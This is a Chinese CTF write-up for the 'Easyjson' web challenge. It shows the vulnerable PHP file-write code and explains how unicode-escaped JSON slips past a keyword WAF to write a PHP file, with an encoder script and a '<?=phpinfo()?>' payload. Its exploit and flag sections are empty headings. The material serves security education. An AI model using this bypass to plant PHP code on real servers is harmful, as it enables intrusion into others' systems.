西湖论剑Easyjson Write up

前言

太菜了只做了一道

Easyjson

• 代码审计

 <?php
include 'security.php';

if(!isset($_GET['source'])){
    show_source(__FILE__);
    die();
}
$sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'/';
var_dump($sandbox);
if(!file_exists($sandbox)){
    mkdir($sandbox);
    file_put_contents($sandbox."index.php","<?php echo 'Welcome To Dbapp OSS.';?>");
}
$action = $_GET['action'];
$content = file_get_contents("php://input");


if($action == "write" &&  SecurityCheck('filename',$_GET['filename']) &&SecurityCheck('content',$content)){
    $content = json_decode($content);
    $filename = $_GET['filename'];
    $filecontent = $content->content;
    $filename = $sandbox.$filename;
    file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS.");
}elseif($action == "reset"){
    $files = scandir($sandbox);
    foreach($files as $file) {
        if(!is_dir($file)){
            if($file !== "index.php"){
                unlink($sandbox.$file);
            }
        }
    }
}
else{
    die('Security Check Failed.');
}

• 代码主要部分在,但是这里有一个waf对文件名和content参数进行过滤。简单Fuzz了一下，filename可以使用php后缀，说明可以写php文件，但是有一个很关键的问题就是content它传来必须是一个json,json中有一个属性是content，例如：{'content':'<?=phpinfo()?>'}但是waf对json进行了过滤，不能存在content这个字符串(还过滤了其他关键字)。

if($action == "write" &&  SecurityCheck('filename',$_GET['filename']) &&SecurityCheck('content',$content)){
    $content = json_decode($content);
    $filename = $_GET['filename'];
    $filecontent = $content->content;
    $filename = $sandbox.$filename;
    file_put_contents($filename,$filecontent."\n Powered By Dbapp OSS.");
}

• 神小密圈发现，json支持的字符中可以支持unicode编码，那么我们全都用unicode编码来代替字符串不就行了？

• 简单测试一下发现可以.Unicode表

• 简单写个脚本来将字符串转化为unicode编码。

<?php

function unicode_encode($str){
    $table = [
            '\u002'=>[' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/'],
            '\u003'=>['0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?'],
            '\u004'=>['@','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O'],
            '\u005'=>['P','Q','R','S','T','U','V','W','X','Y','Z','[','\\',']','^','_'],
            '\u006'=>['`','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o'],
            '\u007'=>['p','q','r','s','t','u','v','w','x','y','z','{','|','}','~']
];
    foreach ($table as $key => $value) {
        $i = 0;
        foreach ($value as $vcode) {
            $i=$i+1;
            if($str==$vcode){
                return $key.bin2e($i-1);
            }

        }
    }

}

function bin2e($str){
    switch ($str) {
        case '10':
            return 'a';
            break;
        case '11':
            return 'b';
            break;
        case '12':
            return 'c';
            break;
        case '13':
            return 'd';
            break;
        case '14':
            return 'e';
            break;
        case '15':
            return 'f';
            break;
        default:
            return $str;
            break;
    }
}

function main($str){
for($i=0;$i<strlen($str);$i++){
    echo unicode_encode($str[$i]);
}
}


main('<?=phpinfo()?>');
?>

• EXP

• Getflag